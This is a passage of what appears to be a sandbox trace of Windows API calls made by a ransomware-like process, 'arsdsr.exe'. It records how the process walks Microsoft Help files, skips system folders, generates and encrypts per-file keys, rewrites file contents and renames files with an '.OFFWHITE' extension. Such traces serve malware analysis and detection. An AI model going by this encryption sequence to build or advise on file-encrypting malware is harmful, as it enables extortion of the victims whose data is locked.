lpString2=".pif") returned -1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.581] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.581] GetProcessHeap () returned 0x500000 [0147.581] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526ce8 [0147.581] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.582] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=350) returned 1 [0147.582] GetProcessHeap () returned 0x500000 [0147.582] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.582] GetProcessHeap () returned 0x500000 [0147.582] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.582] GetProcessHeap () returned 0x500000 [0147.582] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.582] GetProcessHeap () returned 0x500000 [0147.582] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.582] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.582] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.582] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.583] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.583] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.583] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.583] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.583] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.583] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.583] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.583] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.583] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.583] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.583] SetLastError (dwErrCode=0x0) [0147.583] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.585] GetLastError () returned 0x0 [0147.585] GetLastError () returned 0x0 [0147.585] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x25e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.585] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.585] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x35e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.586] WriteFile (in: hFile=0xb0, lpBuffer=0x526ce8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526ce8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.586] GetProcessHeap () returned 0x500000 [0147.586] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15e) returned 0x52ebe8 [0147.586] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.586] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x15e, lpOverlapped=0x0) returned 1 [0147.586] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.586] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x15e, lpOverlapped=0x0) returned 1 [0147.586] GetProcessHeap () returned 0x500000 [0147.586] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.586] CloseHandle (hObject=0xb0) returned 1 [0147.586] GetProcessHeap () returned 0x500000 [0147.586] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.586] GetProcessHeap () returned 0x500000 [0147.586] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.586] GetProcessHeap () returned 0x500000 [0147.586] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.586] GetProcessHeap () returned 0x500000 [0147.586] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.587] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" [0147.587] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.OFFWHITE" [0147.587] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn.offwhite")) returned 1 [0147.587] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x527122e0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.VISIO_STD.14.1033.hxn", cAlternateFileName="MSVISI~2.HXN")) returned 1 [0147.587] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2=".") returned 1 [0147.587] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="..") returned 1 [0147.588] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="...") returned 1 [0147.588] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="windows") returned -1 [0147.588] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.588] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="rsa") returned -1 [0147.588] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.588] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="programdata") returned -1 [0147.588] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="appdata") returned 1 [0147.588] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="program files") returned -1 [0147.588] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.588] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.588] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.VISIO_STD.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" [0147.588] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.588] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.588] PathFindExtensionW (pszPath="MS.VISIO_STD.14.1033.hxn") returned=".hxn" [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.588] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.589] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.589] GetProcessHeap () returned 0x500000 [0147.589] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526cf8 [0147.589] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.589] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=350) returned 1 [0147.589] GetProcessHeap () returned 0x500000 [0147.589] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.589] GetProcessHeap () returned 0x500000 [0147.589] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.589] GetProcessHeap () returned 0x500000 [0147.589] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.589] GetProcessHeap () returned 0x500000 [0147.589] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.589] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.589] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.589] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.590] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.590] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.590] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.590] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.590] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.590] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.590] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.590] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.590] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.590] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.590] SetLastError (dwErrCode=0x0) [0147.590] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.592] GetLastError () returned 0x0 [0147.592] GetLastError () returned 0x0 [0147.592] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x25e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.592] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.592] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x35e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.592] WriteFile (in: hFile=0xb0, lpBuffer=0x526cf8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526cf8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.592] GetProcessHeap () returned 0x500000 [0147.592] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15e) returned 0x52ebe8 [0147.592] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.592] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x15e, lpOverlapped=0x0) returned 1 [0147.592] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.592] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x15e, lpOverlapped=0x0) returned 1 [0147.593] GetProcessHeap () returned 0x500000 [0147.593] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.593] CloseHandle (hObject=0xb0) returned 1 [0147.593] GetProcessHeap () returned 0x500000 [0147.593] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.593] GetProcessHeap () returned 0x500000 [0147.593] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.593] GetProcessHeap () returned 0x500000 [0147.593] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.593] GetProcessHeap () returned 0x500000 [0147.593] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.593] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" [0147.593] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.OFFWHITE" [0147.593] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn.offwhite")) returned 1 [0147.594] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xaf766ee0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf766ee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf7d9300, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.WINPROJ.14.1033.hxn", cAlternateFileName="MSWINP~1.HXN")) returned 1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2=".") returned 1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="..") returned 1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="...") returned 1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="windows") returned -1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="rsa") returned -1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="programdata") returned -1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="appdata") returned 1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="program files") returned -1 [0147.594] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.594] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.594] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.WINPROJ.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" [0147.594] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.594] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.595] PathFindExtensionW (pszPath="MS.WINPROJ.14.1033.hxn") returned=".hxn" [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.595] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.595] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.595] GetProcessHeap () returned 0x500000 [0147.595] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526d08 [0147.595] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.596] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=338) returned 1 [0147.596] GetProcessHeap () returned 0x500000 [0147.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.596] GetProcessHeap () returned 0x500000 [0147.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.597] GetProcessHeap () returned 0x500000 [0147.597] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.597] GetProcessHeap () returned 0x500000 [0147.597] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.597] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.597] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.597] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.597] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.598] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x152, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.598] SetLastError (dwErrCode=0x0) [0147.598] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.599] GetLastError () returned 0x0 [0147.599] GetLastError () returned 0x0 [0147.599] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x252, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.600] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.600] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.600] WriteFile (in: hFile=0xb0, lpBuffer=0x526d08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526d08*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.600] GetProcessHeap () returned 0x500000 [0147.600] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x152) returned 0x51d650 [0147.600] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.600] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x152, lpOverlapped=0x0) returned 1 [0147.600] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.600] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x152, lpOverlapped=0x0) returned 1 [0147.600] GetProcessHeap () returned 0x500000 [0147.600] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.600] CloseHandle (hObject=0xb0) returned 1 [0147.600] GetProcessHeap () returned 0x500000 [0147.601] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.601] GetProcessHeap () returned 0x500000 [0147.601] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.601] GetProcessHeap () returned 0x500000 [0147.601] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.601] GetProcessHeap () returned 0x500000 [0147.601] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 